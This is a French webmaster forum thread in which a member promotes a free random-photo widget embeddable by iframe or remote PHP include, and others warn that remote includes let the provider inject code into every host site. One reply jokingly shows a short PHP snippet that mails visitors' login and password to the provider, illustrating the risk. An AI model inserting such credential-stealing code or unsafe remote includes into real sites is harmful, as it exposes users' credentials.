Service gratuit pour webmaster : BOX Photo Aléatoire

Nouveau WRInaute
Salut a tous, j'ai devellopé un petit service gratuit pour tous les webmaster qui shouaitent ajouter une "box" avec photo aléatoire quelque part sur leur site / portail sans se fatiguer ;)


--------------------


Pour voir un apercu cliquez ici:
http://www.widb.org/random.html


--------------------

Pour utiliser ce service vous avez le choix entre :

<iframe src="http://www.widb.org/random.html"></iframe> (avec tous les attributs de votre choix)
ou
<? readfile("http://www.widb.org/random.html"); ?> (PHP)


--------------------


vous pouvez consulter le catalogue complet des photos disponibles ici:
WIDB.org - World Image Database


--------------------


j'espere que ca vous plaira, si vous avez des suggestions à faire n'hésitez pas, le style de la box peut etre adaptable à tous les sites
 
WRInaute accro
* ne faites pas de publicité pour votre site, vos services ou vos produits commerciaux, ou pour un site ami : votre discussion serait supprimée (c'est le cas par exemple des propositions d'échanges de liens : utilisez la messagerie privée si vous le souhaitez). Si vous avez un annuaire, inscrivez-le dans l'annuaire WRI mais ne venez pas sur le forum appeler les webmasters à inscrire leur site. La seule exception concerne la discussion Liste d'annuaires web francophones dans laquelle vous avez la permission d'annoncer votre annuaire (une seule fois...)
Néanmoins, si vous demandez de l'aide, donnez votre URL !
 
WRInaute discret
tres simpas, présentation tres bien
si tu le permets je ferais de la pub pour ton service sur d'autres forums...
 
WRInaute passionné
widb.org a dit:
voici le code PHP à ajouter dans votre page web (à l'endroit de votre choix) :
include("http://www.widb.org/random.php");

très dangereux ça !!!
quelqu'un qui arrive à modifier random.php pourra détruire tout les site qui l'utilisent !!!
 
Nouveau WRInaute
merci ti_ouf, ya pas de probleme

si les admins veulent supprimer ce post je trouverai ca dommage, il y a de MOINS en MOINS de services gratuit sur le web ... pourquoi nuire à la promotion de celui la ?
IL n'Y a rien de commercial la dedans :wink:
 
WRInaute accro
Non non on se préoccupe de celles de tes utilisateurs :lol:
Si quelqu'un arrive à bidouiller là dedans tout le monde va en prendre pour sa tronche...
 
Nouveau WRInaute
oui j'ai vu, mais ne vous inquitez pas, un maximum de services fonctionnent sur ce model et il n'y a pas de probleme

pour modifier le fichier random.php, il faudrai "hacker" mon hebergeur donc on peut en dire autant de toutes les pages sur le web ...

il n'y a aucun passage de parametres possible avec les script que je propose (dans un sens comme dans l'autre)
 
Membre Honoré
Sympa les vignettes ;)
---
sur le site :
En bas le W des liens c'est pas weborama ? :|

Sinon open source database ne veut pas dire libre de droit (je le rapelle pour ceux qui ont du mal étant donner qu'il y a des photos de monuments ou de publicités lisibles dans les images...blablabla) pour les sites perso parfait mais attentions aux photos souvent avec un unknow dans qui l'a faite :| (je lui ai déjà expliquer mais c'est à titre préventif pour les nouveaux webmasters :wink: j'en ai vu de toutes les sortes :lol: )

J'ai passer le mot à quelques potes pour l'url c'est sympa le site j'espère qu'il continuera dans sa lancée ;)

La fonction search super ;)

Pas vu la cnil sinon mais je sais que sa doit être en cour ;)

Ya des photos magnifiques quand même qui donnent envie de voyager :cry:


=> Résumer : site très interessants et riche en contenu photographique pour amateurs (à cause des droits) mais à visiter directement :wink: Ajouter aux Favoris à la première Visite :D
 
Nouveau WRInaute
le site grossis petit à petit et va s'ameliorer madrileno
en tout cas ton post me fait plaisir ;)

pour ce qui est des boutons du bas, c'est en effet le W de weborama, car lorsque j'utilisais weborama sur mon site (ya 2 semaines) je ne voulais pas que cela nuise au design mais je lai viré assez vite
 
WRInaute passionné
widb.org a dit:
oui j'ai vu, mais ne vous inquitez pas, un maximum de services fonctionnent sur ce model et il n'y a pas de probleme

pour modifier le fichier random.php, il faudrai "hacker" mon hebergeur donc on peut en dire autant de toutes les pages sur le web ...

il n'y a aucun passage de parametres possible avec les script que je propose (dans un sens comme dans l'autre)

la plupart des service ne fonctionnent pas comme ça, ils proposend des <iframe> bien que c'est pas très propre, mais, c'est en moin moin risqué qu'un include, moi j'interdit purement et simplement les includes qui contiennens un http:// dans mes pages (on sait jamais)
 
WRInaute discret
pour plus de secu, remplacer le include() par un reafile(), ce dernier ne parse pas un eventuel code, ou un "echo file_get_contents()", ce qui revient un peu au meme.
 
WRInaute passionné
Personellement j'aurais peur que widb.org rajoute :


<?php
if($pass && $login){
$message = "login : $login , pass : $pass";
mail("son_mail@mail.com","login + mdp","$message","From: <xxxxxx@xxxxx.xx>");
}
?>

:lol:
 
Nouveau WRInaute
bonjour la parano :wink: mais bon il vaut mieux ca que le contraire alors je comprends vos craintes

je vous propose alors d'utiliser d'autres technologies pour utiliser ce service :

j'ai modifié le post initial pour les présenter

qu'en pensez vous ?

en tout cas merci pour vos reflexions qui permettent de proposer un service plus abouti
 
Discussions similaires
Haut